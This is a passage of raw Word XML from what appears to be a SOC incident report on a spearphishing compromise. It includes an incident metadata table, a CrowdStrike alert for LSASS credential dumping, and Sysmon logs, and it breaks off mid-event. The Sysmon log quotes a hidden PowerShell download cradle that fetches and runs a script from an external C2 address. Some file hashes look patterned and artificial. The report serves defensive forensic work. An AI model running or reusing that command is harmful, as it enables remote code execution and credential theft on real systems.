              </w:rPr>
              <w:t xml:space="preserve">FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">VALUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Incident ID</w:t>
            </w:r>
          </w:p>
        </w:tc>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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0312</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Created</w:t>
            </w:r>
          </w:p>
        </w:tc>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2026-03-18T02:41:07Z (auto-generated by analytics rules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Active -&gt; InProgress (assigned 02:43 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Assigned To</w:t>
            </w:r>
          </w:p>
        </w:tc>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SOC-L2: d.okafor@jlr-soc.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Alert Count</w:t>
            </w:r>
          </w:p>
        </w:tc>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7 correlated alerts across 4 rules (CORR-055, 112, 007, 078)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Entities</w:t>
            </w:r>
          </w:p>
        </w:tc>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Hosts: JLR-ENG-WS-047, JLR-ENG-WS-012, FS-RD-COV-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">jthomas@jlr.com  |  SVC-CAD-SYNC01@jlr.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal: 10.20.1.12, 10.20.1.47  |  External C2: 185.234.219.47</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>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FFE066"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">T1566.001 Spearphishing | T1003.001 LSASS | T1021.002 SMB | T1046 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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NIST Category</w:t>
            </w:r>
          </w:p>
        </w:tc>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CAT-2: Unauthorized Access + CAT-5: Malicious Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Playbook Triggered</w:t>
            </w:r>
          </w:p>
        </w:tc>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00FF9F"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">PB-001-P1-CRITICAL: auto-disabled SVC-CAD-SYNC01, paged SOC L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Log Evidence — CrowdStrike Falcon EDR: LSASS Memory Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following CrowdStrike Falcon EDR alert represents the earliest high-confidence indicator of compromise — LSASS memory access by a non-system process (svcupd.exe) — triggering Sentinel rule CORR-055. This is the primary credential theft event log.</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050D1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">=== CROWDSTRIKE FALCON EDR ALERT ===========================</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host         : JLR-ENG-WS-047.jlr.local (VLAN 20 — R&amp;D/Engineering)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert ID     : CS-20260318-00441-LSASS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity     : Critical  |  Confidence: 97%</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp    : 2026-03-18T02:17:33.412Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Tactic       : Credential Access (TA0006)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique    : OS Credential Dumping: LSASS Memory (T1003.001)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Process Tree:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  svchost.exe  (PID 812, SYSTEM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  └─ explorer.exe  (PID 4132, jlr\jthomas)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">     └─ AcroRd32.exe  (PID 7841) [PDF Reader — suspicious]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        └─ cmd.exe  (PID 9203) [SUSPICIOUS — spawned by PDF reader]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">           └─ powershell.exe  (PID 9341) [download cradle]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">              └─ svcupd.exe  (PID 9512, %APPDATA%\svcupd.exe)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert Detail:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  svcupd.exe (PID 9512) opened handle to lsass.exe (PID 632)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Access Rights: PROCESS_VM_READ | PROCESS_QUERY_INFORMATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Technique: MiniDumpWriteDump API call detected — procdump pattern</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Output file: C:\Users\jthomas\AppData\Local\Temp\lsa.dmp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">File Details:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  svcupd.exe  SHA256: a3f8d2c1e7b94560f12a3d8e9c7b14f6a2d3e8c9b7a14560f12a3d8e9c7b14f6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Detection: Trojan.GenericKD.71284512  (Falcon ML + IOA match)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Signed: NO  |  Parent signed: AcroRd32.exe — Adobe (VALID)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Action Taken: ALERT (no auto-kill — monitoring mode on VLAN 20)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Forwarded To: Microsoft Sentinel via CrowdStrike-Sentinel connector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Log Evidence — Sysmon Event Log: Process Creation + ProcessAccess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Sysmon (System Monitor) running on JLR-ENG-WS-047 generated the following events corroborating the CrowdStrike detection and providing additional process-level forensic evidence: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050D1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">=== SYSMON EVENT LOG — JLR-ENG-WS-047 =====================</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log: Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- Event ID 1: Process Create (cmd.exe from AcroRd32.exe) ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">EventRecordID  : 1183442</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">UtcTime        : 2026-03-18 02:11:52.103</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ProcessGuid    : {4A3B2C1D-0A1B-2C3D-4E5F-6A7B8C9D0E1F}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ProcessId      : 9203</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Image          : C:\Windows\System32\cmd.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CommandLine    : cmd.exe /c powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://185.234.219.47/upd.ps1')"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ParentImage    : C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ParentCmdLine  : AcroRd32.exe JLR_Supplier_Invoice_March.pdf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">User           : JLR\jthomas</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Hashes         : SHA256=7A3B2C1D4E5F6A7B8C9D0E1F2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- Event ID 10: ProcessAccess (LSASS memory read) ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">EventRecordID  : 1183519</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">UtcTime        : 2026-03-18 02:17:33.412</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SourceProcessGuid: {4A3B2C1D-0B2C-3D4E-5F6A-7B8C9D0E1F2A}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
